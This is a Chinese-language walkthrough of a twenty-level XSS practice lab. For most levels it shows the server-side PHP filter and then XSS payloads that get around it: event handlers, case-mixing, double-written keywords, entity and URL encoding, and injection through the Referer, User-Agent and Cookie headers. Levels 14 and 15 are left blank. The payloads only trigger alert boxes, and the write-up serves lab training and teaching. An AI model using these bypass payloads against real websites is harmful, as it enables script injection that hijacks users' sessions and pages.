level-1

• 在“name=”后面写什么，网页就显示什么。
  

• 查看源码，发现写入的数据在<>标签的外面，那么name的值直接换成JS：
  <script>alert(1)</script>
<svg/onload=alert(1)>
<script>confirm(1)</script>
<script>prompt(1)</script>
  

level-2

• 此处为搜索型的xss，分析代码，使用的是get方法，从url中接收一个keyword搜索参数，此处用到了一个过滤函数htmlspecialchars（），这个函数把预定义的字符转换为HTML实体，“>”和“<”转义了，但value里面没有过滤掉。
• 后端代码描述：

echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

• 一方面，黑名单绕过——不使用被过滤的符号，使用js的事件，如：" onmouseover=alert(2) >click。还需要注意的地方就是前面的符号闭合。
• 另一方面，利用value里面没有过滤掉的漏洞。"><sript>alert(111)</script>，仍然是注意前面的闭合，就可以了。
  

level-3

• 同理于level-2，也是用来过滤函数htmlspecialchars（），就连value里面的也过滤了。
  
• 尖括号和双引号：>、<、"都会被过滤，是能是避开这些符号了。但没有过滤'（单引号）。所以，此处尝试js语句，' onmouseover=alert(666)//、' onfocus=javascript:alert(1) '测试，后面无法闭合，所以使用了注释“//”。
  

level-4

• 从后台源码可以看到，传入进去的值经过了两个函数的处理，str_replace(">","",$str)，此函数是将变量str中的字符>转换为空，转换时区分大小写；同样也把<转换为空，然后再经过函数的过滤转化，这时要在没有符号“<>”的情况下构造语句，并且不被htmlspecialchars()函数影响。所以这里可以构造一个输入到文本框后出现相应的事件。

$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

• Payload:
  " onfocus=alert(666) autofocus="
\"onfocus=javascript:alert(1) '
" onclick=alert(666)//
• onfocus事件：定义的事件将在对象获得焦点时触发，这里指input标签获得焦点。
• autofocus属性：input标签的属性，当页面加载input标签，自动获得焦点。
• 焦点：这里指你的光标的位置，也就是说当你的光标出现在input文本框这里，将进行onfocus事件的发生。

level-5

• 从下图中提交<script>alert("on")</script>，响应显现：<script转换为<scr_ipt，on转换成o_n，还用到了过滤函数htmlspecialchars()。所有就无法使用：

<script>alert("666")</script>
οnfοcus=javascript:alert(1)
οnclick=alert(666)

• 后端过滤语句：

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

• 但是没有过滤尖括号>、<。可以使用的payload："><iframe src=javascript:alert(666)>、
• "> <a href="javascript:alert(5)">click me !!!</a> //
  

level-6

• 本level用了多个黑名单过滤：
  <script转换成<scr_ipt
on转换成o_n
src转换成sr_c
data转换成da_ta
href转换成r_ef
• 还有htmlspecialchars()函数。
• 怎么办？？ 没有做大小写转换。利用大小写转换绕过

"> <SCRIpt>alert(6)</SCriPT>
"> <img Src=a ONerrOR=alert(6)>//
"> <a HrEf="javascript:alert(6)">click me!!!</a>//
"> <svg x="" ONclick=alert(6)>//
"> ONclick=alert(6) //

• 后端过滤语句：

$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

level-7

• 将多种字符串替换为空，script、on、src、data、href字符串都替换为空。
  
• 所以，尝试双写绕过。payload：
  "> <scscriptript>alert(666)</scrscriptipt>
" oonnmouseover=alert(666)//
"> <a hrhrefef=javascrscriptipt:alert(666)>CLICK ME !!!</a>//
  
• 后端过滤语句：

$str =strtolower( $_GET["keyword"]);	#把所有字符转换为小写
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>

level-8

• 本level也是用了多个黑名单过滤：
  <script转换成<scr_ipt
on转换成o_n
src转换成sr_c
data转换成da_ta
href转换成r_ef
"转换成&quot
  大小写过滤并被编码
• 输出点在a标签内，href属性中，属性里的双引号被转换成HTML实体，无法截断属性。
  
• But，>、<、'、%、#、& 符号没有被过滤。
• 综上所述，这里可以使用伪协议绕过javascript:alert，由于script关键字被过滤，javascript会被替换成javasc_ript，使用&#x72来代替r（这里采用HTML字符实体转换），伪协议后面可以使用URL编码进行编码。
• Payload：

javascript:alert(666)
javascript:alert`666`

• 后端过滤语句：

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?phpecho '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>

level-9

• 在level-8的基础上，增加了URL的自动检测，如果发现添加友情链接中没有带http://内容则会显示为不合法。

if(false===strpos($str7,'http://')){echo '<center><BR><a href="您的链接不合法？有没有！">友情链接</a></center>';}
else{echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';}

• Payload：

javascript:alert`http://`		
javascript:alert("http://")
javascript:%0dalert("http://")
javascript:alert(666)//http://a.com 	 	# 利用注释  	
javascript:%0ahttp://a.com%0dalert(666)  	#不利用注释

level-10

• 查看前端源码，有3个hidden的隐藏输入框，玄机在此。
  
• 后端源码片段：

$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>

• 结合前后端代码，构造XSS的注入代码keyword=test&t_sort="type=“submit” οnclick="alert(10)
  

level-11

• 查看前端源码，还是有4个hidden的隐藏输入框。
  
• 其中多了一个t_ref，其中value是Referer。玄机在此。
• 后端源码片段：

$str11=$_SERVER['HTTP_REFERER'];		#获取当前链接的上一个连接(即：Referer)
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">

• 抓包，在Referer处注入XSS代码。Payload:" onmouseover=alert(11) type="text"。注意：后端代码的过滤绕过。
  

level-12

• 类似于level-11，XSS注入点在User-Agent处。
• 抓包，在User-Agent处注入XSS代码。Payload:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" onclick=alert(1) type="text"

。注意：后端代码的过滤绕过。

level-13

• 类似于level-11，XSS注入点在Cookie:处。
• 抓包，在Cookie:处注入XSS代码。Payload:

Cookie: __cfduid=dcbe5402f7b1131bb2f3820efea101d991592536346; user=call+me+maybe%3F" onclick=alert(1) type="text"

。注意：后端代码的过滤绕过。

level-14

level-15

level-16

• 前端代码没有发现任何线索。查看后端源码：

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace("	"," ",$str4);
echo "<center>".$str5."</center>";
?>
<center><img src=level16.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";
?>

• script、[空格]、/都被替换为&nbsp。这时，可以尝试使用%0a,%0d来进行绕过。
• Payload：

<img%0Dsrc=1%0Donerror=alert(666)>
<img%0asrc=1%0aonerror=alert(666)>
<img%0asrc=x%0donError=alert('666')>
<iframe%0asrc=x%0donmouseover=alert`666`></iframe>

• 成功执行
  

level-17

• 查看页面，也只有在URL中有两个传参点：arg01、arg02。在此插入XSS语句。
• 插入的语句，后端有过滤。应该是htmlspecialchars()函数。
  
• 绕过，用on事件触发。Payload：

onmouseout=alert(666)
onmouseover=alert(666)

level-18

• 与level-17相同。

level-19

arg01=version&arg02=Click Here

level-20

arg01=id&arg02="))}catch(e){}if(!self.a)self.a=!alert(666)//&width&height

总结：

一、 xss注入大多在标签中进行
1、简单构造标签为<script>alert(1)</script>
2、更好用的标签：<img src=x onerror=alert(1)>和<a href=javascript:alert(1)>111</a>
3、更好用的参数：onmouseover=alert(1)

二、利用单双引号闭合标签。
三、关键字过滤问题：
1、大小写绕过（html不区分大小写），
2、双写绕过（只删除一次关键字的过滤）
3、html字符编码转码绕过（特殊符号，关键字字母），
4、回车空格替换。

四、html注释：//
五、利用信息头文件注入 如：referer, cookie, user_agent。
六、angular js中的ng-include问题：引入问题页面。
七、flash xss中的getURL，navigateToURL：引入问题页面，或js代码。